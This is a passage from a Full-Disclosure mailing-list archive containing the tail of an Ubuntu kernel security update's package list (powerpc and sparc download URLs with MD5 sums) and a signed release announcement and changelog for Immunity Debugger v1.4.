http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 91166 cfe80b9b270aaa9af06d2c406e4db2dc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 107278 ad9db01dee28bd56deda9ea44def212a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 40962 835db27c5e0658d638d4695fe8fdeb7e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 44728 418647b29e31d5fdfcf40f4e99768ef4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 40978 faa13def56803bfd5da5bb3ba9b65fc5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 773458 695805480463d01db0b5410c23a4b735 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 709222 05912a85bbbe4739356b7ba9a69f505e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 773366 e4396a0a76de96a5710415e46a3e2550 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 243300 73c16dadcb78f70194880943219faa90 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 236366 2ff2b94fea409b17e090971c06e7a99d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 243258 2d99dcb8d58339b3ef10a0d6e401f0c5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 53762 2cda7a39545d0a3dfdf2aec735e2b0b8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 47378 77ad726e6f68c4cc34478900e792d6f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 53740 18149f314f91fc49aea088a1c98c3331 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 69038 9394dfb7f941941d18057b97ed843cda http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 62394 a8f9ba27161c04f659dc4f13aeafb61b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 68972 09c313cc1035038c8a63fd82fdffbff4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 166814 b63767933833637d66d5f2c0fd102a75 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 147476 957b0dae4ed134633530e5e31a161682 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 166688 e49bfcf1de63fbe0931f63fd1f5dfd0a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 347896 1466204b2395d10fe4a15382788ea21b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 385004 677c6969d21e946d834709f39efe3766 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 347790 a0f546d60939ffbf2481b86756662723 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 3204080 9f894434b4c0ec2727354479a4832e69 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 2182252 85e8a43b037dd81d30470c549970c946 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 3120804 a116d297928f1f9fc6d414e85f4d494f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-cell_2.6.22-14.51_powerpc.deb Size/MD5: 658278 db54b942af04eb0c43a521e6df67e685 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc-smp_2.6.22-14.51_powerpc.deb Size/MD5: 567080 b712399ae49807be6b86c11977f4c435 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc64-smp_2.6.22-14.51_powerpc.deb Size/MD5: 571742 5dca014dc429cde88290aee0fa6f9466 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc_2.6.22-14.51_powerpc.deb Size/MD5: 566790 46f601e71b40dbee4b20844982160642 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-cell_2.6.22-14.51_powerpc.deb Size/MD5: 19764838 a6c5c34b2d448719fbe7465d5db5aa0c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc-smp_2.6.22-14.51_powerpc.deb Size/MD5: 18708782 e9719b9339d69fadcf3bf5022d4a2e95 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc64-smp_2.6.22-14.51_powerpc.deb Size/MD5: 19743012 15c44ee1d0df2a3a77104dd5ac878b2d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc_2.6.22-14.51_powerpc.deb Size/MD5: 18483398 a42260daefab364bb17170ab530d4f3e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_powerpc.deb Size/MD5: 629122 523711ed75266796795fed665de37a9d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 298636 3eeeaa21b5adc86ac2c9e1cd45fb1b0c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 256436 f8f345041049311ddf1410da74cdb40c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 298540 0491df9de452fc1175a8d7e8dc0c6fef http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 173312 074bfedb47a5f28b1a3f3469433a9113 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 159598 7e5e5213920503815666460a5f31e456 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 173266 225154854c11fde96fcf69cbad5aa383 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 288550 0b4f4f9c42e90eae5447bf6bbacaea64 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 256366 33f669c1a356a8551e9934b71ef4c56c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 288484 2104568d5fba36a95c7e64f38866e63c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 1931632 53ff6c998913a0a04510d6b6e7708694 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 1654746 6ef0176c868ab202269c364ea7d9bf9a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 1909798 b0e590a2e8501a4c479f0b40b23d2200 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 216058 874ff3bd336c5efee7df9aad59b14c9d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 234428 23b4066629a576b8d67a6c1993d726b5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 224102 684574c3567381ab1ef4d92d329fbdaa http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 181638 7a90c86bb89a87fe957d964a576006ad http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 153854 fd439ba89e3716a4f8f4a9c8014d2345 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 181568 b9ee9056cf15a549a1bc44eeeb2ee0dc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 103618 a8ff35b79df674ee7938ea9be92d6d8c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 86732 4687704bf65014f8651a7c602227c567 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 103486 70e6f3bb35e15d13496960774b292b89 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 46968 05c98002c23ca01e4cbaec75120c0386 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 45402 3d1c1d0d6daa2d1c342f3e9c41d3512a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 46990 773bf46f2de692c06a95379becb32efe http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 54466 4675526f52be9e1a6977f6ed2ac4b45a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 41566 f9841c40936c89373d8bf06a115605a6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 47800 cf9c25932005676016484ab1fb8e23ff http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 87028 cb0314c3b2b71f2052b2c340ea1fd5d3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 74044 65d10ff25d7b0aa1f436504b84237e4d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 87000 401f6db031db7e82765812813d2f19eb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 30294 8c1d9387ecd25871638d1f1fdf4299ad http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 76262 9c321effb70e67c0ca38111c0439b23e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 30320 cac5ab46451e109e4aa8f0b2fcdd3edb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 9944 cfb6f2dec7da13af5ac94bb90a7b07e9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 8456 6a8b453c691e0d5a83e7405f72512635 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 9946 3f6bc2f6cb3bdfefa798d0b0ef8973ef http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 68470 bcdc3d8d53f6cea1eb0eaa9d64a3007f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 56868 dc2cdc8c4ec09bee63614de403167d05 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 68450 cd1d3cd23bf3234be5607c6a79a10a30 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 131420 e67fb172159455d82c04f0a86e607f35 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 87802 3c118e73f1456e8267026c1a82104cae http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 131242 1f1aaed227c6f475f312333a99251435 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 1432142 aa733ab34026296af001d282b83ed756 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 1441252 f474ebdbf144a7dd86ca2de964bbe003 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 1432056 3aaab714864bf27fb4c152ac8fa6209d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 70942 d26e171c9b6b3a80b442fb4f5525a1ad http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 75506 b3bfa244684cbebc8830b72a77e7f4ec http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 84750 77311918b0eaf6d58922eb04ed0a95cb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 14528 428222023bf05f4f448c88960f8b9f0b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 12526 23e4a0793d3287323f94e23621a5d34f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 14528 004dee3afbe741bc92e07d1e13fe46bb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 558358 c187edbade80249854e6f826a3896033 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 492718 58c3eae42399c3bd2e76d26c5f546fc4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 549324 dcdbf765e239b792c41b27c82b603153 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb Size/MD5: 105356 41e99bfc7b583339323fb76beb86a635 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb Size/MD5: 79660 b4ba9625685b845ad14cf3d07178544e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb Size/MD5: 104298 dc9e68d7635ecd9289b56179763cf19d sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 59314 48e9a8ed9f2b56a8b8cb51a273a06ede http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 68264 a2d332c0643bf6b1a4e53cae6f3bfe9e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 42126 e79a1e7135eabf2d9d497eeb0ff5a063 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 95324 22b9cde814f894b66be8d5e85493b043 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 594028 4e82b58f932c9b8d38db5c4d9fe3274c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 169366 6f6d29a958b09979738bb3b17040fed7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 38250 c5bb908a6b4ba4c2df0854c0547694ec http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 38640 ccad5e69ca054d862cdd01de9f8c3608 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 154608 309598ae61ea2055a1105eb95dd04395 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 1992728 62f6bbcd5d90bccddf1c03bd6dc811e5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-sparc64-smp_2.6.22-14.51_sparc.deb Size/MD5: 475656 983165021233a6f4818f3d7df6dd480c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-sparc64_2.6.22-14.51_sparc.deb Size/MD5: 474000 14ab54585c4f5fe06361e10c48735c8c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-sparc64-smp_2.6.22-14.51_sparc.deb Size/MD5: 12414922 f8fbde5e6de9d1cfe385c521f3ff55d2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-sparc64_2.6.22-14.51_sparc.deb Size/MD5: 12180792 cf2ad7921f617b3e85978603851d782c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_sparc.deb Size/MD5: 683970 daeaffb36d535c6c5ff100446777a168 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 265804 e16972aa57e535422ec219d703fe2b0f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 159904 aed2604b943ac15347285ba2ccaed7e3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 247420 c13d045745e03c9e41f443ce8cda80cb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 1253996 792ab6d6a423e5a8c2f6ca51b4026140 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 159994 3cc047df902584eba563a584523744ab http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 91956 68fb5604af7f1f3f5c6d63a7192d4567 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 40628 101c44a6ad87402a2ce0708438e956d2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 38578 b728e295a5ae24b60648fa54e9cc96c2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 8642 0f86cab5b1e20475cd33cf50d04a32f7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 60062 6eb9bf4be178a0d732cf373868a6e08a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 90988 158d88a7ce2a3206abb3a789b261fc43 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 875868 f92fdfed5a7b07bcb27d676e648ebf24 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 9756 c9f533a3f3ec1cc8d52930f2c59a5ee7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 369260 3da59dbc90209256155801d4a2398135 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb Size/MD5: 56884 adc85553e31023c42ef7c8623154a9a9 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080204/25830b6d/attachment.bin From nicolas at immunityinc.com Mon Feb 4 19:00:38 2008 From: nicolas at immunityinc.com (Nicolas Waisman) Date: Mon, 04 Feb 2008 17:00:38 -0200 Subject: [Full-disclosure] Immunity Debugger v1.4 Release Message-ID: <47A760D6.3090404@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Immunity is proud to announce: Immunity Debugger v1.4 "veni, vidi, pwn" We would like to express our appreciation for the enormous amount of contributions, feedback and requests we receive daily from the Immunity Debugger community at http://forum.immunityinc.com. Our TODO list seems infinite but we are getting the most requested features out there for you guys. New in this release: a proper process detach, a Second Pass Analysis which will soon grow into better argument/local variable recognitions and a new Silent Mode for batch scripts. Last but not least, we have included a collection of new scripts including a lot of contributions from forum regular Bob (scanpe.py, hidedebug.py and bpxep.py) and the contest winning plugin from JMS (Instead of a candle dinner with Kostya, he received a brand new job as a Developer on the CANVAS team). Thanks for using Immunity Debugger! We hope you enjoy this month's release, Check out the Changelog below for more detailed information. You can upgrade your current Immunity Debugger by going to Help/Update or directly downloading the new installer from http://debugger.immunityinc.com/register.html Sincerely Team Immunity http://www.immunityinc.com PS: Feedback, Requests, Scripts and Cool Screenshots are always welcome at http://forum.immunityinc.com 1.40 Build 0 New Features: - - Debugger Core: o Added Silent Debugging Flag [accesible via Debugging options ALT-O or via immlib] http://forum.immunityinc.com/index.php?topic=157.0 o Added Analysis Second Pass [Decoding Functions] http://forum.immunityinc.com/index.php?topic=163.0 - - Debugger GUI Core: o Now you can add headers + other useful information on every Row displayed at the Disasm Window. The information will be saved as part of dump struct. o Dettach option added to File Menu: Go to File -> Dettach [You need to be attached to gray out Dettach] http://forum.immunityinc.com/index.php?topic=158.0 - - Debugger GUI: o Right click on disasm line -> Add Header will add headers to your line - - Immunity Debugger API: o Row Headers / Adding Lines to CPU - Added imm.addHeader() and imm.getHeader() methods. - imm.addLine behaves like addHeader() - Added imm.removeHeader()/imm.removeLine() && imm.getHeader()/imm.getLine() - Added imm.getTraceArgs() o Added imm.goSilent() method. o Added imm.undecorateName() method: Undecorate symbol names http://forum.immunityinc.com/index.php?topic=159.0 o Added imm.Dettach() method: Dettach current process from debugger o Added imm.prepareForNewProcess() method: Prepare Debugger core for a fresh start o Updated BoB's UserDB.txt (http://peid.info/BobSoft/Downloads.html) - - PyCommands: o Added namefunc.py : a simple samplescript that uses imm.addHeader to name functions in module o Added traceargs.py: find User supplied arguments into a given function. o Added JMS's Mike & Boo script o User Contributed PyCommands: - BoB (http://PEiD.info/BobSoft/) * scanpe.py (http://forum.immunityinc.com/index.php?topic=137.0) * hidedebug.py (http://forum.immunityinc.com/index.php?topic=140.0) * bpxep.py (http://forum.immunityinc.com/index.php?topic=138.0) Bug Fixes: - - Fixed error when adding knowledge and changing python enviroments later. (__dict__ not accesible in restricted mode error) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHp2DWnx8KWzmcRsERAju5AKCfqxxOfzlHSJthrJou04kI0ekwSACgpvqt Ld9oTgMCWJD5i9zjKH6RZzE= =TVk0 -----END PGP SIGNATURE----- From advisories at coresecurity.com Mon Feb 4 